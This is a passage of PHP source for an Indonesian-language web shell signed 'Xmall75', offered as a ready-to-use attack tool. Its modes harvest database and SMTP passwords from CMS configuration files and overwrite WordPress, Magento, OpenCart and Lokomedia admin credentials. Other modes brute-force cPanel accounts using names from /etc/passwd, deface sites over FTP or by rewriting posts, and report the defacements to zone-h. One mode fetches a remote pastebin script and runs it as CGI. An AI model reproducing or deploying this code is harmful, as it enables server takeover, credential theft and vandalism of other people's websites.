1439 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1440 } else {
1441 $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1442 }
1443 $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1444 echo "Config => ".$file_conf."<br>";
1445 echo "CMS => Wordpress<br>";
1446 echo $url_target;
1447 if(!$update OR !$conn OR !$db) {
1448 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1449 } else {
1450 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1451 }
1452 mysql_close($conn);
1453 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1454 $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1455 $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1456 $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1457 $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1458 $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1459 $prefix = $dbprefix."admin_user";
1460 $option = $dbprefix."core_config_data";
1461 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1462 $db = mysql_select_db($dbname);
1463 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1464 $result = mysql_fetch_array($q);
1465 $id = $result[user_id];
1466 $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1467 $result2 = mysql_fetch_array($q2);
1468 $target = $result2[value];
1469 if($target == '') {
1470 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1471 } else {
1472 $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1473 }
1474 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1475 echo "Config => ".$file_conf."<br>";
1476 echo "CMS => Magento<br>";
1477 echo $url_target;
1478 if(!$update OR !$conn OR !$db) {
1479 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1480 } else {
1481 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1482 }
1483 mysql_close($conn);
1484 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1485 $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1486 $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1487 $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1488 $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1489 $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1490 $prefix = $dbprefix."user";
1491 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1492 $db = mysql_select_db($dbname);
1493 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1494 $result = mysql_fetch_array($q);
1495 $id = $result[user_id];
1496 $target = ambilkata($config,"HTTP_SERVER', '","'");
1497 if($target == '') {
1498 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1499 } else {
1500 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1501 }
1502 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1503 echo "Config => ".$file_conf."<br>";
1504 echo "CMS => OpenCart<br>";
1505 echo $url_target;
1506 if(!$update OR !$conn OR !$db) {
1507 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1508 } else {
1509 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1510 }
1511 mysql_close($conn);
1512 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1513 $dbhost = ambilkata($config,'server = "','"');
1514 $dbuser = ambilkata($config,'username = "','"');
1515 $dbpass = ambilkata($config,'password = "','"');
1516 $dbname = ambilkata($config,'database = "','"');
1517 $prefix = "users";
1518 $option = "identitas";
1519 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1520 $db = mysql_select_db($dbname);
1521 $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1522 $result = mysql_fetch_array($q);
1523 $target = $result[alamat_website];
1524 if($target == '') {
1525 $target2 = $result[url];
1526 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1527 if($target2 == '') {
1528 $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1529 } else {
1530 $cek_login3 = file_get_contents("$target2/adminweb/");
1531 $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1532 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1533 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1534 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1535 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1536 } else {
1537 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1538 }
1539 }
1540 } else {
1541 $cek_login = file_get_contents("$target/adminweb/");
1542 $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1543 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1544 $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1545 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1546 $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1547 } else {
1548 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1549 }
1550 }
1551 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1552 echo "Config => ".$file_conf."<br>";
1553 echo "CMS => Lokomedia<br>";
1554 if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1555 echo $url_target2;
1556 } else {
1557 echo $url_target;
1558 }
1559 if(!$update OR !$conn OR !$db) {
1560 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1561 } else {
1562 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1563 }
1564 mysql_close($conn);
1565 }
1566 }
1567 }
1568 } else {
1569 echo "<center>
1570 <h1>Auto Edit User Config</h1>
1571 <form method='post'>
1572 DIR Config: <br>
1573 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1574 Set User & Pass: <br>
1575 <input type='text' name='user_baru' value='Xmall75' placeholder='user_baru'><br>
1576 <input type='text' name='pass_baru' value='Xmall75' placeholder='pass_baru'><br>
1577 <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1578 </form>
1579 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1580 ";
1581 }
1582} elseif($_GET['do'] == 'cpanel') {
1583 if($_POST['crack']) {
1584 $usercp = explode("\r\n", $_POST['user_cp']);
1585 $passcp = explode("\r\n", $_POST['pass_cp']);
1586 $i = 0;
1587 foreach($usercp as $ucp) {
1588 foreach($passcp as $pcp) {
1589 if(@mysql_connect('localhost', $ucp, $pcp)) {
1590 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1591 } else {
1592 $_SESSION[$ucp] = "1";
1593 $_SESSION[$pcp] = "1";
1594 if($ucp == '' || $pcp == '') {
1595
1596 } else {
1597 $i++;
1598 if(function_exists('posix_getpwuid')) {
1599 $domain_cp = file_get_contents("/etc/named.conf");
1600 if($domain_cp == '') {
1601 $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1602 } else {
1603 preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1604 foreach($domains_cp[1] as $dj) {
1605 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1606 $user_cp_url = $user_cp_url['name'];
1607 if($user_cp_url == $ucp) {
1608 $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1609 break;
1610 }
1611 }
1612 }
1613 } else {
1614 $dom = "<font color=red>function is Disable by system</font>";
1615 }
1616 echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
1617 }
1618 }
1619 }
1620 }
1621 }
1622 if($i == 0) {
1623 } else {
1624 echo "<br>sukses nyolong ".$i." Cpanel";
1625 }
1626 } else {
1627 echo "<center>
1628 <form method='post'>
1629 USER: <br>
1630 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1631 $_usercp = fopen("/etc/passwd","r");
1632 while($getu = fgets($_usercp)) {
1633 if($getu == '' || !$_usercp) {
1634 echo "<font color=red>Can't read /etc/passwd</font>";
1635 } else {
1636 preg_match_all("/(.*?):x:/", $getu, $u);
1637 foreach($u[1] as $user_cp) {
1638 if(is_dir("/home/$user_cp/public_html")) {
1639 echo "$user_cp\n";
1640 }
1641 }
1642 }
1643 }
1644 echo "</textarea><br>
1645 PASS: <br>
1646 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1647 function cp_pass($dir) {
1648 $pass = "";
1649 $dira = scandir($dir);
1650 foreach($dira as $dirb) {
1651 if(!is_file("$dir/$dirb")) continue;
1652 $ambil = file_get_contents("$dir/$dirb");
1653 if(preg_match("/WordPress/", $ambil)) {
1654 $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1655 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1656 $pass .= ambilkata($ambil,"password = '","'")."\n";
1657 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1658 $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1659 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1660 $pass .= ambilkata($ambil,'password = "','"')."\n";
1661 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1662 $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1663 } elseif(preg_match("/^[client]$/", $ambil)) {
1664 preg_match("/password=(.*?)/", $ambil, $pass1);
1665 if(preg_match('/"/', $pass1[1])) {
1666 $pass1[1] = str_replace('"', "", $pass1[1]);
1667 $pass .= $pass1[1]."\n";
1668 } else {
1669 $pass .= $pass1[1]."\n";
1670 }
1671 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1672 $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1673 }
1674 }
1675 echo $pass;
1676 }
1677 $cp_pass = cp_pass($dir);
1678 echo $cp_pass;
1679 echo "</textarea><br>
1680 <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1681 </form>
1682 <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1683 }
1684
1685} elseif($_GET['do'] == 'domain'){
1686 echo "<center><div><p align='center'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table><tr bgcolor=#333><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
1687
1688} elseif($_GET['do'] == 'server'){
1689
1690 echo "<br><center><b>-=Server Security Informations=-</b><center><br>";
1691echo "<center><div class='tmpe'>
1692<table align='center' width='50%'><td><font color='#007700'>Kernel Version</font></td><td>";echo php_uname();
1693echo "<tr><td><font color='#007700'>Web Server</font></td><td>";echo $_SERVER["SERVER_SOFTWARE"];
1694echo "<tr><td><font color='#007700'>PHP Version</font></td><td>";echo phpversion(); echo " on "; echo php_sapi_name();
1695echo "<tr><td><font color='#007700'>Current User</font></td><td>";echo get_current_user();
1696echo "<tr><td><font color='#007700'>User ID</font></td><td>";echo getmyuid();
1697echo "<tr><td><font color='#007700'>Group</font></td><td>";echo getmygid();
1698echo "<tr><td><font color='#007700'>Cwd </font></td><td>";echo getcwd();
1699echo "<tr><td><font color='#007700'>Admin Server</font></td><td>";echo $_SERVER['SERVER_ADMIN'];
1700echo "<tr><td><font color='#007700'>Server Port</font></td><td>";echo $_SERVER['SERVER_PORT'];
1701echo "<tr><td><font color='#007700'>Server IP</font></td><td>";echo $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
1702echo "<tr><td><font color='#007700'>Client IP</font></td><td>";echo $_SERVER['REMOTE_ADDR'];
1703echo "<tr><td><font color='#007700'>cURL support</font></td><td>";echo function_exists('curl_version')?'Enabled':'No';
1704echo "<tr><td><font color='#007700'>Readable /etc/passwd</font></td><td>";echo @is_readable('/etc/passwd')?"Readable <a href='?action=moco'> [View]</a>":"Not Readable";
1705echo "<tr><td><font color='#007700'>Readable /etc/shadow</font></td><td>";echo @is_readable('/etc/shadow')?"Readable":"Not Readable";
1706$base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON <font color='#007700'>secure</font>":"OFF <font color='#007700'>not secure</font>";
1707echo "<tr><td><font color='#007700'>Open Base Dir</font></td><td><font class=txt>" . $base . "</font>";
1708echo "</table></div></center><br>";
1709
1710} elseif($_GET['do'] == 'hashid') {
1711if (isset($_POST['gethash'])) {
1712 $hash = $_POST['hash'];
1713 if (strlen($hash) == 32) {
1714 $hashresult = "MD5 / MD2 / MD4 Hash";
1715 } elseif (strlen($hash) == 40) {
1716 $hashresult = "SHA-1 Hash / MySQL5 Hash";
1717 } elseif (strlen($hash) == 13) {
1718 $hashresult = "DES(Unix) Hash";
1719 } elseif (strlen($hash) == 16) {
1720 $hashresult = "MySQL Hash / DES(Oracle Hash)";
1721 } elseif (strlen($hash) == 41) {
1722 $GetHashChar = substr($hash, 40);
1723 if ($GetHashChar == "*") {
1724 $hashresult = "MySQL5 Hash";
1725 }
1726 } elseif (strlen($hash) == 64) {
1727 $hashresult = "SHA-256 Hash";
1728 } elseif (strlen($hash) == 96) {
1729 $hashresult = "SHA-384 Hash";
1730 } elseif (strlen($hash) == 128) {
1731 $hashresult = "SHA-512 Hash";
1732 } elseif (strlen($hash) == 34) {
1733 if (strstr($hash, '$1$')) {
1734 $hashresult = "MD5(Unix) Hash";
1735 }
1736 } elseif (strlen($hash) == 37) {
1737 if (strstr($hash, '$apr1$')) {
1738 $hashresult = "MD5(APR) Hash";
1739 }
1740 } elseif (strlen($hash) == 34) {
1741 if (strstr($hash, '$H$')) {
1742 $hashresult = "MD5(phpBB3) Hash";
1743 }
1744 } elseif (strlen($hash) == 34) {
1745 if (strstr($hash, '$P$')) {
1746 $hashresult = "MD5(Wordpress) Hash";
1747 }
1748 } elseif (strlen($hash) == 39) {
1749 if (strstr($hash, '$5$')) {
1750 $hashresult = "SHA-256(Unix) Hash";
1751 }
1752 } elseif (strlen($hash) == 39) {
1753 if (strstr($hash, '$6$')) {
1754 $hashresult = "SHA-512(Unix) Hash";
1755 }
1756 } elseif (strlen($hash) == 24) {
1757 if (strstr($hash, '==')) {
1758 $hashresult = "MD5(Base-64) Hash";
1759 }
1760 } else {
1761 $hashresult = "Hash type not found";
1762 }
1763 } else {
1764 $hashresult = "Not Hash Entered";
1765 }
1766
1767?>
1768
1769<center><br><br><br>
1770
1771 <form action='' method='POST'>
1772 <tr>
1773 <table>
1774 <th colspan='5'>Hash Identifier</th>
1775 <tr><B><td>Enter Hash</td></b><td>:</td> <td><input type='text' name='hash' size='60' /></td><td><input type='submit' name='gethash' value='>>' style='color: #eee;' /></td></tr>
1776 <tr><b><td>Result</td><td>:</td><td><font color='red'><?php echo $hashresult; ?></font></td></tr></b>
1777 </table></tr></form>
1778 </center>
1779
1780<?php
1781
1782} elseif($_GET['do'] == 'cpftp_auto') {
1783 if($_POST['crack']) {
1784 $usercp = explode("\r\n", $_POST['user_cp']);
1785 $passcp = explode("\r\n", $_POST['pass_cp']);
1786 $i = 0;
1787 foreach($usercp as $ucp) {
1788 foreach($passcp as $pcp) {
1789 if(@mysql_connect('localhost', $ucp, $pcp)) {
1790 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1791 } else {
1792 $_SESSION[$ucp] = "1";
1793 $_SESSION[$pcp] = "1";
1794 if($ucp == '' || $pcp == '') {
1795 //
1796 } else {
1797 echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1798 $ftp_conn = ftp_connect($ip);
1799 $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1800 if((!$ftp_login) || (!$ftp_conn)) {
1801 echo "[+] <font color=red>Login Gagal</font><br><br>";
1802 } else {
1803 echo "[+] <font color=lime>Login Sukses</font><br>";
1804 $fi = htmlspecialchars($_POST['file_deface']);
1805 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1806 if($deface) {
1807 $i++;
1808 echo "[+] <font color=lime>Deface Sukses</font><br>";
1809 if(function_exists('posix_getpwuid')) {
1810 $domain_cp = file_get_contents("/etc/named.conf");
1811 if($domain_cp == '') {
1812 echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1813 } else {
1814 preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1815 foreach($domains_cp[1] as $dj) {
1816 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1817 $user_cp_url = $user_cp_url['name'];
1818 if($user_cp_url == $ucp) {
1819 echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1820 break;
1821 }
1822 }
1823 }
1824 } else {
1825 echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1826 }
1827 } else {
1828 echo "[-] <font color=red>Deface Gagal</font><br><br>";
1829 }
1830 }
1831 //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1832 }
1833 }
1834 }
1835 }
1836 }
1837 if($i == 0) {
1838 } else {
1839 echo "<br>sukses deface ".$i." Cpanel";
1840 }
1841 } else {
1842 echo "<center>
1843 <form method='post'>
1844 Filename: <br>
1845 <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1846 Deface Page: <br>
1847 <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1848 USER: <br>
1849 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1850 $_usercp = fopen("/etc/passwd","r");
1851 while($getu = fgets($_usercp)) {
1852 if($getu == '' || !$_usercp) {
1853 echo "<font color=red>Can't read /etc/passwd</font>";
1854 } else {
1855 preg_match_all("/(.*?):x:/", $getu, $u);
1856 foreach($u[1] as $user_cp) {
1857 if(is_dir("/home/$user_cp/public_html")) {
1858 echo "$user_cp\n";
1859 }
1860 }
1861 }
1862 }
1863 echo "</textarea><br>
1864 PASS: <br>
1865 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1866 function cp_pass($dir) {
1867 $pass = "";
1868 $dira = scandir($dir);
1869 foreach($dira as $dirb) {
1870 if(!is_file("$dir/$dirb")) continue;
1871 $ambil = file_get_contents("$dir/$dirb");
1872 if(preg_match("/WordPress/", $ambil)) {
1873 $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1874 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1875 $pass .= ambilkata($ambil,"password = '","'")."\n";
1876 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1877 $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1878 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1879 $pass .= ambilkata($ambil,'password = "','"')."\n";
1880 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1881 $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1882 } elseif(preg_match("/client/", $ambil)) {
1883 preg_match("/password=(.*)/", $ambil, $pass1);
1884 if(preg_match('/"/', $pass1[1])) {
1885 $pass1[1] = str_replace('"', "", $pass1[1]);
1886 $pass .= $pass1[1]."\n";
1887 }
1888 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1889 $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1890 }
1891 }
1892 echo $pass;
1893 }
1894 $cp_pass = cp_pass($dir);
1895 echo $cp_pass;
1896 echo "</textarea><br>
1897 <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1898 </form>
1899 <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1900 }
1901} elseif($_GET['do'] == 'smtp') {
1902 echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1903 function scj($dir) {
1904 $dira = scandir($dir);
1905 foreach($dira as $dirb) {
1906 if(!is_file("$dir/$dirb")) continue;
1907 $ambil = file_get_contents("$dir/$dirb");
1908 $ambil = str_replace("$", "", $ambil);
1909 if(preg_match("/JConfig|joomla/", $ambil)) {
1910 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1911 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1912 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1913 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1914 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1915 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1916 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1917 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1918 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1919 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1920 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1921 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1922 }
1923 }
1924 }
1925 $smpt_hunter = scj($dir);
1926 echo $smpt_hunter;
1927} elseif($_GET['do'] == 'auto_wp') {
1928 if($_POST['hajar']) {
1929 $title = htmlspecialchars($_POST['new_title']);
1930 $pn_title = str_replace(" ", "-", $title);
1931 if($_POST['cek_edit'] == "Y") {
1932 $script = $_POST['edit_content'];
1933 } else {
1934 $script = $title;
1935 }
1936 $conf = $_POST['config_dir'];
1937 $scan_conf = scandir($conf);
1938 foreach($scan_conf as $file_conf) {
1939 if(!is_file("$conf/$file_conf")) continue;
1940 $config = file_get_contents("$conf/$file_conf");
1941 if(preg_match("/WordPress/", $config)) {
1942 $dbhost = ambilkata($config,"DB_HOST', '","'");
1943 $dbuser = ambilkata($config,"DB_USER', '","'");
1944 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1945 $dbname = ambilkata($config,"DB_NAME', '","'");
1946 $dbprefix = ambilkata($config,"table_prefix = '","'");
1947 $prefix = $dbprefix."posts";
1948 $option = $dbprefix."options";
1949 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1950 $db = mysql_select_db($dbname);
1951 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1952 $result = mysql_fetch_array($q);
1953 $id = $result[ID];
1954 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1955 $result2 = mysql_fetch_array($q2);
1956 $target = $result2[option_value];
1957 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1958 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1959 echo "<div style='margin: 5px auto;'>";
1960 if($target == '') {
1961 echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1962 } else {
1963 echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1964 }
1965 if(!$update OR !$conn OR !$db) {
1966 echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1967 } else {
1968 echo "<font color=lime>sukses di ganti.</font><br>";
1969 }
1970 echo "</div>";
1971 mysql_close($conn);
1972 }
1973 }
1974 } else {
1975 echo "<center>
1976 <h1>Auto Edit Title+Content WordPress</h1>
1977 <form method='post'>
1978 DIR Config: <br>
1979 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1980 Set Title: <br>
1981 <input type='text' name='new_title' value='Hacked by Xmall75 - Security Cyber Art' placeholder='New Title'><br><br>
1982 Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1983 <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1984 <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1985 <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1986 </form>
1987 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1988 ";
1989 }
1990} elseif($_GET['do'] == 'zoneh') {
1991 if($_POST['submit']) {
1992 $domain = explode("\r\n", $_POST['url']);
1993 $nick = $_POST['nick'];
1994 echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1995 echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1996 function zoneh($url,$nick) {
1997 $ch = curl_init("http://www.zone-h.com/notify/single");
1998 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1999 curl_setopt($ch, CURLOPT_POST, true);
2000 curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
2001 return curl_exec($ch);
2002 curl_close($ch);
2003 }
2004 foreach($domain as $url) {
2005 $zoneh = zoneh($url,$nick);
2006 if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
2007 echo "$url -> <font color=lime>OK</font><br>";
2008 } else {
2009 echo "$url -> <font color=red>ERROR</font><br>";
2010 }
2011 }
2012 } else {
2013 echo "<center><form method='post'>
2014 <u>Defacer</u>: <br>
2015 <input type='text' name='nick' size='50' value='Xmall75'><br>
2016 <u>Domains</u>: <br>
2017 <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
2018 <input type='submit' name='submit' value='Submit' style='width: 450px;'>
2019 </form>";
2020 }
2021 echo "</center>";
2022
2023} elseif($_GET['do'] == 'cgi') {
2024 $cgi_dir = mkdir('idx_cgi', 0755);
2025 $file_cgi = "idx_cgi/cgi.izo";
2026 $isi_htcgi = "AddHandler cgi-script .izo";
2027 $htcgi = fopen(".htaccess", "w");
2028 fwrite($htcgi, $isi_htcgi);
2029 fclose($htcgi);
2030 $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
2031 $cgi = fopen($file_cgi, "w");
2032 fwrite($cgi, $cgi_script);
2033 fclose($cgi);
2034 chmod($file_cgi, 0755);
2035 echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
2036} elseif($_GET['do'] == 'fake_root') {
2037 ob_start();
2038 $cwd = getcwd();
2039 $ambil_user = explode("/", $cwd);
2040 $user = $ambil_user[2];
2041 if($_POST['reverse']) {
2042 $site = explode("\r\n", $_POST['url']);
2043 $file = $_POST['file'];
2044 foreach($site as $url) {
2045 $cek = getsource("$url/~$user/$file");
2046 if(preg_match("/hacked/i", $cek)) {
2047 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
2048 }
2049 }
2050 } else {
2051 echo "<center><form method='post'>
2052 Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
2053 User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
2054 Domain: <br>
2055 <textarea style='width: 450px; height: 250px;' name='url'>";
2056 reverse($_SERVER['HTTP_HOST']);
2057 echo "</textarea><br>
2058 <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
2059 </form><br>
2060 NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
2061 }
2062
2063} elseif($_GET['do'] == 'hasher') {
2064
2065 $submit = $_POST['go'];
2066 if (isset($submit)) {
2067
2068 $pass = $_POST['password']; // password
2069 $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
2070 $hash = md5($pass); // md5 hash
2071 $md2 = hash("md2",$pass); // md2 hash
2072 $md4 = hash("md4", $pass); // md4
2073 $md5_md4_md2 = md5($md4.$md2.$pass); // md5 - md4 - md2
2074 $hash_md5 = md5($salt . $pass); // md5 hash with salt
2075 $hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1
2076 $hash1 = sha1($pass); // sha1 hash
2077 $sha256 = hash('sha256', $pass); // sha256
2078 $sha384 = hash('sha384', $pass); // sha384
2079 $sha512 = hash('sha512', $pass); // sha512
